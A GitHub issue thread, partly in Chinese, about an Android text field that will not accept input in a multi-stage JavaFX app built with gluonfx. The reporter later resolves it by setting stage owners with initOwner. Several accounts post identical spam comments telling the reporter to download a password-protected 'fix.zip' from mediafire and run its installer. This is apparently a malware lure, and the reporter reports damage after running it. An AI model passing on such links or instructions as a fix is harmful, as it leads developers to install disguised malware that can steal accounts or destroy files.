### ISSUE TITLE
Programs with multiple stages will cause the text input box to be unable to enter normally on Android

### ISSUE THREAD

**Issue by iammmmmmm** [gluonhq/gluonfx-maven-plugin#516]
## 我无法在我的安卓设备上的文本框中输入任何字符。
描述：
如标题所说。在我的安卓9虚拟机（主机为windows11）上我无法输入任何字符（长按也没有复制粘贴选项），随后我在我的手机（安卓13 miui14.0.4.0）上进行测试一开始是一模一样的无法输入任何字符（即使获取到焦点也没有任何反应（没有弹出输入法）），然后我拿起我的迷你键盘通过usb插入手机后神奇的居然能够输入了（只能是英文），但这只是偶然，我不能确定到底它为什么能输入了，我更不知道它为什么又不能输入了。偶然的我突然复制了一段文本粘长按TextField，随后弹出粘贴按钮，粘贴，令人吃惊的是文本被正确输入进TextField了，当然这并不能改变什么，TextField依旧是无法输入是不可用的。

### [grrlvm ce 17](https://github.com/gluonhq/graal/releases/tag/gluon-22.1.0.1-Final) 我所使用的graalvm
如果您有任何见解或解决方案，我将非常感谢您的帮助！
## I am unable to input any characters into the TextField on my Android device.
Description:

As the title suggests, I cannot input any characters into the TextField on my Android 9 virtual machine (hosted on Windows 11). Long pressing does not bring up copy-paste options either. I then tested on my phone (Android 13, MIUI 14.0.4.0) and encountered the same issue—no characters could be entered, and even when the TextField gained focus, the keyboard did not appear.

Interestingly, when I connected a mini keyboard to my phone via USB, I was able to input characters (only in English). However, this was inconsistent, and I am unsure why it worked or why it stopped working. At one point, I copied some text and long-pressed the TextField, which brought up the paste option. Pasting the text worked, but the TextField remains unusable for direct input.

You can find the code and the pom.xml file for the entire project here: [GitHub Repository.](https://github.com/iammmmmmm/caiDanCi)
### [grrlvm ce 17](https://github.com/gluonhq/graal/releases/tag/gluon-22.1.0.1-Final) is i use
If you have any insights or solutions, I would greatly appreciate your help!

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iammmmmmm** [comment]
Thanks, but can you tell me more? I can't understand something

**Comment by iammmmmmm** [comment]
Unfortunately I can't run this installer, it crashes when I open it.

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iammmmmmm** [comment]
我日你妈的的黑客！草你奶奶 
FKU！

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KomoriDev** [comment]
> 我日你妈的的黑客！草你奶奶 FKU！

Many accounts have been stolen recently. I'm curious what happened after you clicked on this dangerous link :)

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iammmmmmm** [comment]
> > I'm your fucking hacker! Fuck your grandma FKU!
>
> Many accounts have been stolen recently. I'm curious what happened after you clicked on this dangerous link :) Many accounts have been stolen recently. I'm curious what happened after you clicked on this dangerous link :)

Nothing even happened. After many full scans, nothing happened except that my rust compilation tool chain and graalvm compiled software were almost deleted. Thank you for your concern.

**Comment by iammmmmmm** [comment]
If you are confused please read:
![image](https://github.com/user-attachments/assets/a48da9b8-fba7-4e78-a3a6-fd66fa8aaef2)

**Comment by iammmmmmm** [comment]
问题有了进展，确定了只要弹出过信息窗口就会出现无法输入的问题。
https://github.com/user-attachments/assets/db50b028-4d73-4753-b3c4-102d521a98f9

**Comment by iammmmmmm** [comment]
这是这个问题的最小复现：
[inputTest.zip](https://github.com/user-attachments/files/16926389/inputTest.zip)

**Comment by iammmmmmm** [comment]
我解决了这个问题，使用initOwner方法设置对应的stage之间关系后此问题解决。更多信息请看查看[here](https://github.com/iammmmmmm/caiDanCi/commit/0d254765e0b6e360aa80ff765aebbb2bbaf7593d)
